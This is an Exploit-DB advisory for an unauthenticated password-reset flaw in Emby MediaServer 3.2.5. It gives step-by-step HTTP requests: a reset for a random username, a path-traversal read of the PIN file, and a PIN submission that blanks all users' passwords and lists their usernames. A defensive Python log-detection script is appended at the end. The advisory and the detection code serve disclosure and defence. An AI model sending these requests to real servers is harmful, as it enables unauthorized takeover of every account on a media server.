Emby MediaServer 3.2.5 – Password Reset

  • Author: LiquidWorm
    Date: 2017-04-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41947/
  • Emby MediaServer 3.2.5 Password Reset Vulnerability
    
    
    Vendor: Emby LLC
    Product web page: https://www.emby.media
    Affected versions: 3.2.5, 3.1.5, 3.1.2, 3.1.1, 3.1.0, 3.0.0
    
    Summary: Emby (formerly Media Browser) is a media server designed to organize,
    play, and stream audio and video to a variety of devices. Emby is open-source,
    and uses a client-server model. Two comparable media servers are Plex and Windows
    Media Center.
    
    Desc: The issue can be triggered by an unauthenticated actor within the home network
    (LAN) only. The attacker does not need to supply a valid username to start a password
    reset: any random string is accepted, and the PIN that the server writes to disk can
    then be read through the file disclosure issue (ZSL-2017-5403). Submitting that PIN
    discloses every valid username on the Emby server and resets the passwords of all
    users to a blank password. Attackers can exploit this to gain unauthenticated and
    unauthorized access to the Emby media server management interface.
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
               Ubuntu Linux 14.04.5
               MacOS Sierra 10.12.3
               SQLite3
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2017-5401
    Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
    
    SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
    
    
    22.12.2016
    
    --
    
    
    1. First we initiate the Forgot Password feature from within our home network:
    ------------------------------------------------------------------------------
    
    http://10.211.55.3:8096/web/forgotpassword.html
    
    
    2. Then, we type any random username and hit submit:
    ----------------------------------------------------
    
    POST /emby/Users/ForgotPassword HTTP/1.1
    Host: 10.211.55.3:8096
    Connection: keep-alive
    Content-Length: 32
    accept: application/json
    Origin: http://10.211.55.3:8096
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
    x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
    content-type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://10.211.55.3:8096/web/forgotpassword.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8,mk;q=0.6
    DNT: 1
    
    EnteredUsername=RandomusUsuarius
    
    
    
    3. You will get an alert message (Windows/Linux):
    -------------------------------------------------
    
    The following file has been created on your server and contains instructions on how to proceed:
    
    C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
    
    -- OR --
    
    /var/lib/emby-server/passwordreset.txt
    
    
    4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
    ----------------------------------------------------------------
    
    GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
    Host: 10.211.55.3:8096
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate, sdch
    Accept-Language: en-US,en;q=0.8
    Connection: close
    
    HTTP/1.1 200 OK
    X-UA-Compatible: IE=Edge
    Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
    Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
    Access-Control-Allow-Origin: *
    Vary: Accept-Encoding
    ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
    Cache-Control: public
    Expires: -1
    Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
    Content-Type: text/plain
    Date: Tue, 28 Feb 2017 12:14:51 GMT
    Content-Length: 164
    Connection: close
    
    Use your web browser to visit:
    
    http://10.211.55.3:8096/web/forgotpasswordpin.html
    
    Enter the following pin code:
    
    6727
    
    The pin code will expire at 91
    
    
    
    5. Following the instructions and entering the PIN resets the passwords of all Emby users on the system:
    ---------------------------------------------------------------------------------------------------------
    
    POST /emby/Users/ForgotPassword/Pin HTTP/1.1
    Host: 10.211.55.3:8096
    Connection: keep-alive
    Content-Length: 9
    accept: application/json
    Origin: http://10.211.55.3:8096
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
    x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
    content-type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.8,mk;q=0.6
    DNT: 1
    
    Pin=6272
    
    ---
    
    We get the message:
    
    Passwords have been removed for the following users. To login, sign in with a blank password.
    
    testingus
    test321
    beebee
    admin
    ztefan
    lio
    miko
    dni
    embyusertest
    joxypoxy
    test123
    thricer
    teppei
    admin2
    delf1na
    
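Detection logic for the chain shown in steps 2 through 5, as an added example that is not part of the advisory or of Emby: it runs over constructed access-log lines in an assumed "client method path status" format and flags traversal sequences in request paths, a successful read of passwordreset.txt, and the reset request, PIN-file read and PIN submission arriving from the same client.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines ("client method path status"); not from the advisory.
SAMPLE_LOG = """\
10.211.55.2 POST /emby/Users/ForgotPassword 200
10.211.55.2 GET /emby/swagger-ui/..\\..\\..\\..\\Users\\lqwrm\\AppData\\Roaming\\Emby-Server\\passwordreset.txt 200
10.211.55.2 POST /emby/Users/ForgotPassword/Pin 200
10.211.55.7 GET /emby/swagger-ui/index.html 200
10.211.55.9 GET /emby/swagger-ui/%2e%2e/%2e%2e/other/file.txt 404
"""

LINE_RE = re.compile(r"^(\S+) (GET|POST|PUT|DELETE) (\S+) (\d{3})$")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")  # "../" or "..\" after percent-decoding

def parse_line(line):
    """Split one log line into fields; decode the path twice so double-encoded '..' is caught."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ip, method, raw_path, status = m.groups()
    return {"ip": ip, "method": method, "path": unquote(unquote(raw_path)), "status": int(status)}

def is_traversal(path):
    return TRAVERSAL_RE.search(path) is not None

def analyze(log_text):
    """Return (ip, severity, reason) findings: a traversal attempt is 'medium', a 200 on the
    reset PIN file is 'high', and ForgotPassword -> PIN file read -> PIN submit is 'critical'."""
    findings = []
    stages = defaultdict(set)  # client ip -> stages of the reset chain seen so far
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        ip, path = ev["ip"], ev["path"]
        if ev["method"] == "POST" and path == "/emby/Users/ForgotPassword":
            stages[ip].add("reset_requested")
        elif ev["method"] == "POST" and path == "/emby/Users/ForgotPassword/Pin":
            stages[ip].add("pin_submitted")
        if is_traversal(path):
            pin_file = path.lower().endswith("passwordreset.txt") and ev["status"] == 200
            findings.append((ip, "high" if pin_file else "medium", "path traversal: " + path))
            if pin_file:
                stages[ip].add("pin_file_read")
        if {"reset_requested", "pin_file_read", "pin_submitted"} <= stages[ip]:
            findings.append((ip, "critical", "reset request, PIN file read and PIN submit from one client"))
            stages[ip].clear()  # report the chain once per client
    return findings
```

On a real server the same logic would run over the reverse-proxy or Emby request log with the parser adapted to its format; a critical finding warrants checking which accounts now have blank passwords.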